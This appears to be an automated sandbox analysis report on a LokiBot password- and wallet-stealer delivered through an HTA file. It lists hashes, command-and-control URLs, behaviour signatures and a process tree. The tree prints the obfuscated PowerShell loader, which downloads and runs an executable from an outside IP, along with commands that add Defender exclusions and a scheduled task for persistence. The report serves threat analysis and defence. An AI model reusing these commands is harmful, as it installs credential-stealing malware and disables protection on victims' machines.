Analysis

  • max time kernel
    119s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 07:19

General

  • Target

    greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta

  • Size

    178KB

  • MD5

    4ce3b0e612e1968b6c491ab1ab818884

  • SHA1

    cbc890a816e9b7e993c90fb63d51526a76616323

  • SHA256

    a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0

  • SHA512

    9b87141b10a2e781e51483dced485817aeb34b545f6dbf64803b4b3621cd4dd74587a5033ab1aa3b931fbd39bc7c77650a0ccdd6b4132b48fbeab9d0fbb3d816

  • SSDEEP

    96:4vCl17HUofTaTGoHTapZR3CyYaMJhS1i3hTaNopQ:4vCldHULTG3pZLYKi3gN2Q

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.41/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
      "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1352
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2744
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yygz-_yf.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7BA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD7B9.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2096
      • C:\Users\Admin\AppData\Roaming\caspol.exe
        "C:\Users\Admin\AppData\Roaming\caspol.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2844
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1060
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1456
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5B69.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1836
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2216

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESD7BA.tmp

    Filesize

    1KB

    MD5

    3112e1b1ad9c31faa74f1c23fa539356

    SHA1

    a4ca1a7c6858078749fbb53e96452563c6a6e2d4

    SHA256

    c5e3ca49a654c74b23b45b9c10bd52a07074f089296d7f238c07f70e59df95f2

    SHA512

    e6d8b36b949240b2176608cde7391db5aa2bfa02926be81777b3969970b6f2a83208185e3398377cfd53c3f0483665f4ef35a2b46aeb0b08204503d581b20626

  • C:\Users\Admin\AppData\Local\Temp\tmp5B69.tmp

    Filesize

    1KB

    MD5

    644acd672def50f90420e4f03528d496

    SHA1

    03ddd4937e44f36e9cfbfd97812b8f0cd44fef73

    SHA256

    f0200586128367b78d108181914aee71aa5e921161c36921a9f98d291f86c2bf

    SHA512

    31ff4b7640c0a06e83741a132413b4bf85773d14b0a7a5a12306339f76b2fa4a66aa3934bca47ba4a6639ad7861a94c689a4d907ed81c5182e6d551d451bcac3

  • C:\Users\Admin\AppData\Local\Temp\yygz-_yf.dll

    Filesize

    3KB

    MD5

    63b7c94192c91c41ed9599d4027f1864

    SHA1

    2f729fbeef93d95f38291ff15a4f2a1e8abfe46f

    SHA256

    f44cf0ee89deea2b92ceb23342473d7bfef4f86be796ad4426f263aaf09795ed

    SHA512

    b11e3dafe861af2947c600261889f6b7985bfaee5e73925444e8edd779e0988fc000bb8f875d6bc49431e295dfc57559f58eb3d0de2afedf8eb744f2620165d8

  • C:\Users\Admin\AppData\Local\Temp\yygz-_yf.pdb

    Filesize

    7KB

    MD5

    a45938611a6990e0538f54be4863c634

    SHA1

    661d7dc529ae744893df27e5d2d89135a7976434

    SHA256

    8d76319dd56ad6740350d97cadcc4353a8b5565687dd1e0e0b5fde43eec4ecdf

    SHA512

    a73e7d284d259e94c3a70a4fed37b6a659327bbe3fc0d6838db63a9170e521d7032f9eaec1eec9a8b69d841448a5b2daea15882d9134d5090410958aef66ea1b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    9a5f8f28cd7be7a84d1d0cf33bac967f

    SHA1

    d3f2b64909980123efdb7077997b8fb7df2bd841

    SHA256

    01f303a121024bbf0992561d9323bf218cddd617d82aea5d862c12da974bdafd

    SHA512

    3226321cd441392715cafd9f0909048ccc3003d747625e20b0631f3ef2eed89248c5bdfcd4cb0c6256a830c1b6653a64dfdf78ceb215fffbf7d5f9aa1512434f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    35fa34d8e175aca60aa63d5c0bbba04d

    SHA1

    2b12ff28f32f3cfd7e102c55b77efef53086784c

    SHA256

    3436cbceb57520feca975a98b44df7f33c453560b3f8f9f7103fe7f327a23051

    SHA512

    8028b4c926e3fc56ac7649c15cf1824071296c2ca48d399b27a7841a9dc645da791fed16081abbb690835badf20b5909ad9c3f101752a1b9b00dffeeb618a53f

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCD7B9.tmp

    Filesize

    652B

    MD5

    df2a95e4185073c5332d6df93099c54e

    SHA1

    73414dc5dda05bdcae60ad1a0ee19821dfb06088

    SHA256

    4be699c85a59f2bfeca2f059afbd77573231bae4947bde88c5bd9db246494670

    SHA512

    cf13d791464125af71aa959634674bf5e6abe80a09493683d5fd1cb78cbc0f22e4f3034552bd0971b84216cb0ce72b526e8e8e31d2f1aa15ced80a14b5700a4a

  • \??\c:\Users\Admin\AppData\Local\Temp\yygz-_yf.0.cs

    Filesize

    484B

    MD5

    fe82050659a8b97690d60529499222c1

    SHA1

    7cc50135852b46dd1e36f2ff98506613db525a68

    SHA256

    64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a

    SHA512

    59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f

  • \??\c:\Users\Admin\AppData\Local\Temp\yygz-_yf.cmdline

    Filesize

    309B

    MD5

    5423583de2ddb787508e3d60ef57237d

    SHA1

    9ae2c941350820f705adced6f8d7327de8aa56a9

    SHA256

    3a75ab620ed0a503c47f6d8843b5c224525f67fe9ed28f54561043a650a43cd1

    SHA512

    39a84d9ec48bffcef7d6b50adfcb1f18dadd7a6366e76a56415c222dfcde2ed82cabc7f8e46230f4873e11655d79ea4d9374e70f2ffd5e1aa98e1ba02b1ff7ec

  • \Users\Admin\AppData\Roaming\caspol.exe

    Filesize

    586KB

    MD5

    74061922f1e78c237a66d12a15a18181

    SHA1

    e31ee444aaa552a100f006e43f0810497a3b0387

    SHA256

    89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c

    SHA512

    306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136

  • memory/2216-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2216-62-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-68-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-66-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-64-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-75-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-73-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-70-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-95-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2216-103-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2844-46-0x00000000052A0000-0x0000000005304000-memory.dmp

    Filesize

    400KB

  • memory/2844-45-0x0000000000340000-0x0000000000352000-memory.dmp

    Filesize

    72KB

  • memory/2844-44-0x0000000001250000-0x00000000012E8000-memory.dmp

    Filesize

    608KB